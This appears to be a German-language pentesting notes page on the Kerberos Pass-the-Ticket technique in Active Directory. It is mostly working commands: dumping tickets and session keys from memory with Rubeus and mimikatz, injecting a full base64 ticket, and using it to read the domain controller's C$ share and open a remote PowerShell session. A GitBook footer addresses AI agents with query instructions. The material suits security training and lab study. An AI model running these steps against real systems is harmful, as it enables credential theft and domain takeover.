> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/active-directory/lateral-movement/pass-the-ticket.md).

# Pass-the-Ticket

Um die Kerberos-Tickets anzuzeigen, die mit der aktuellen Sitzung verknüpft sind, können wir `klist`.

```bash
klist
```

<figure><img src="/files/8aeafa99f557559d04e233a8b924c0b087158540" alt=""><figcaption></figcaption></figure>

Tickets und Sitzungsschlüssel können dann extrahiert werden.

Wenn wir beispielsweise eine PowerShell unter dem Konto starten `administrador`, werden dessen Tickets in den Speicher geladen.

<figure><img src="/files/b01f10ec5e91b674ac3a2947187e76f1dc9c6128" alt="" width="406"><figcaption></figcaption></figure>

Dann haben wir das TGT und den entsprechenden Sitzungsschlüssel im Speicher.

Um sie zu extrahieren, müssen Sie lokale Administratorrechte besitzen.

Wir können dann `Rubeus`.

```bash
.\Rubeus.exe dump
```

Dieser Befehl zeigt alle Tickets im Speicher an, einschließlich derer des Kontos `administrador`.

<figure><img src="/files/74fbe8a4b21c0fdd2867460b7062e881d44a37c2" alt=""><figcaption></figcaption></figure>

Mit `mimikatz` können wir außerdem Tickets und Sitzungsschlüssel extrahieren.

```bash
./mimikatz.exe

sekurlsa::tickets
```

<figure><img src="/files/9b67d56157f90303049f57b11db3dba2ba2eab71" alt=""><figcaption></figcaption></figure>

Sobald das Ticket abgerufen wurde, können wir es auf einem anderen Rechner mit `Rubeus`, sogar ohne lokale Administratorrechte auf diesem Zielsystem.

```bash
.\Rubeus.exe ptt /ticket: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
```

<figure><img src="/files/bc6eb9cbfa9a0c596eb29bfdd69b6f1cc0a3a1a5" alt=""><figcaption></figcaption></figure>

Wenn wir `klist`, sehen wir, dass das geladene Ticket tatsächlich zu `administrador`.

```bash
klist
```

<figure><img src="/files/6414591de90e25fe2f74b3497eb0a9013bda9d72" alt=""><figcaption></figcaption></figure>

Dann können wir auf die Ressourcen des Domänencontrollers zugreifen.

```bash
dir //DC01/c$
```

<figure><img src="/files/5d6640bd1c1dd33b2c48b7db9282bccdb56befd1" alt="" width="563"><figcaption></figcaption></figure>

Mit diesem Ticket können wir auch eine Remote-Sitzung auf anderen autorisierten Rechnern öffnen.

```bash
Enter-PSSession -ComputerName DC01
```

<figure><img src="/files/4876d7c87ed05ed6851f3645256022637f43f51b" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/active-directory/lateral-movement/pass-the-ticket.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
